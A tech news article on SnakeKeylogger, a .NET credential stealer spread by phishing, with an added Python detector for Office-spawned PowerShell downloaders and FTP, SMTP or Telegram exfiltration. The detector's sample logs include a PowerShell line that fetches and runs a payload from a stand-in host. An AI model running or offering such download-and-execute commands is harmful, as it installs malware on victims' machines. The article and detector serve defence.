Sneaky SnakeKeylogger slithers into Windows inboxes to steal sensitive secrets

Malware logs users' keystrokes, pilfers credentials, exfiltrates data


Criminals are preying on Windows users yet again, this time in an effort to hit them with a keylogger that can also steal credentials and take screenshots.

In an alert this month, Fortinet's FortiGuard Labs warned of an uptick in SnakeKeylogger infections. Once running on someone's PC, this malware records the victim's keystrokes as they log into things, fishes usernames and passwords out of their files, and takes screenshots to snoop on people, and then sends all that sensitive info to fraudsters.

"Based on the FortiGuard telemetry, there were hundreds of zero-day detection hits," the threat intelligence group said, adding that the logger was spotted contacting outside servers multiple times.

By "zero-day detection", Fortinet means in this context that the software was flagged for acting suspiciously before it was in the company's database of known software nasties; in other words, the SnakeKeylogger samples its antivirus encountered were a new strain, as far as Fortinet was concerned. A signature to detect the malware was added to FortiGuard's detection engine on July 31, in version 92.06230.

SnakeKeylogger, aka KrakenKeylogger, is a Microsoft .NET-based stealer already known for credential theft and keylogging capabilities. It was originally sold on a subscription basis on Russian crime forums.

The malware became a "significant threat" in November 2020, according to Splunk's threat research team, and it's known for its crafty exfiltration of data from victims' devices. It uses FTP to transfer people's private files and SMTP to send emails containing sensitive data, and it integrates with the messaging app Telegram, allowing crooks to receive stolen info in real time.

"Moreover, it exhibits an adeptness in gathering clipboard data, browser credentials, and conducting system and network reconnaissance," Splunk's security researchers noted.

Additionally, the malware "demonstrates a notable sophistication by utilizing a variety of cryptors or loaders to obfuscate its code and evade detection by sandboxes," the team added.

While the Fortinet alert doesn't specify how the criminals are breaking into machines to deploy SnakeKeylogger, this stealer is usually spread via phishing campaigns. We've asked for additional details about these attacks, and will update this story if we hear back from Fortinet.

In a separate alert about SnakeKeylogger's use in hijacking victims' online accounts, using their stolen creds, Check Point said malicious code is typically hidden in a maliciously crafted Office document or PDF attached to an email, and once the recipient opens that document, the payload finds a way to fetch and run the logger.

"The malware embedded in the document is typically a downloader," the security shop explained. "It uses PowerShell scripts to download a copy of Snake Keylogger to the infected system and execute it."
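As an added example (not code from Fortinet, Check Point, Splunk or this article), the following Python flags the two behaviours described above over constructed log records: an Office application or PDF reader spawning PowerShell with a download command, as in the downloader stage Check Point describes, and outbound FTP, SMTP or Telegram API connections from processes that are not known mail, FTP or browser clients, matching the exfiltration channels Splunk lists. The record format, the sample process names and the allowlists are assumptions.

```python
import re

# Assumed parent processes for a booby-trapped Office document or PDF.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
# PowerShell command-line fragments that indicate a download cradle.
DOWNLOAD_MARKERS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|-enc", re.I)
# Exfiltration channels named in the article: FTP and SMTP ports, Telegram's API host.
EXFIL_PORTS = {21: "ftp", 25: "smtp", 587: "smtp-submission"}
EXFIL_HOSTS = {"api.telegram.org"}
# Assumed allowlist of legitimate mail, FTP and browser clients.
KNOWN_CLIENTS = {"outlook.exe", "thunderbird.exe", "filezilla.exe",
                 "chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}

# Constructed sample records in a hypothetical key=value log format (not real telemetry).
SAMPLE_LOGS = [
    'process-create parent=WINWORD.EXE image=powershell.exe cmd="powershell -w hidden -c Invoke-WebRequest http://example.invalid/a.exe -OutFile a.exe; a.exe"',
    'process-create parent=explorer.exe image=powershell.exe cmd="powershell Get-ChildItem"',
    "net-connect image=a.exe dst=198.51.100.7 port=21",
    "net-connect image=outlook.exe dst=198.51.100.9 port=587",
    "net-connect image=a.exe dst=api.telegram.org port=443",
    "net-connect image=chrome.exe dst=example.com port=443",
]

FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')  # key=value or key="quoted value"

def parse(line):
    """Split a record into its kind plus a dict of fields; quoted values keep spaces."""
    kind, _, rest = line.partition(" ")
    fields = {k: (q if v.startswith('"') else v) for k, v, q in FIELD.findall(rest)}
    fields["kind"] = kind
    return fields

def detect(line):
    """Return a finding for a suspicious record, or None."""
    r = parse(line)
    image = r.get("image", "").lower()
    if r["kind"] == "process-create":
        if (r.get("parent", "").lower() in OFFICE_PARENTS and image == "powershell.exe"
                and DOWNLOAD_MARKERS.search(r.get("cmd", ""))):
            return f"office-spawned PowerShell downloader: {r['parent']} -> {r['cmd']}"
    elif r["kind"] == "net-connect" and image not in KNOWN_CLIENTS:
        port = int(r.get("port", 0))
        if port in EXFIL_PORTS:
            return f"possible {EXFIL_PORTS[port]} exfiltration by {image} to {r['dst']}"
        if r.get("dst", "").lower() in EXFIL_HOSTS:
            return f"Telegram API contact by non-allowlisted process {image}"
    return None

def scan(lines):
    """Return (index, finding) pairs for every record that trips a rule."""
    return [(i, f) for i, line in enumerate(lines) if (f := detect(line))]
```

Tune the allowlists to your own environment before relying on the network rules; the process-spawn rule is the higher-fidelity signal.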

This is probably also the case in the recent rash of infections. Among other steps for network defenders to take to protect their organizations from the keylogger, FortiGuard Labs recommends: "Be cautious when opening emails, clicking links, and downloading attachments."

Plus, the org offers other reminders that apply to protecting against all sorts of malware-dropping attacks.

These include keeping security services up to date using the most recent versions of databases and engines. Plus, turn on antivirus and sandbox features in local and network policies, and use endpoint security products that protect users both pre- and post-exploitation. ®
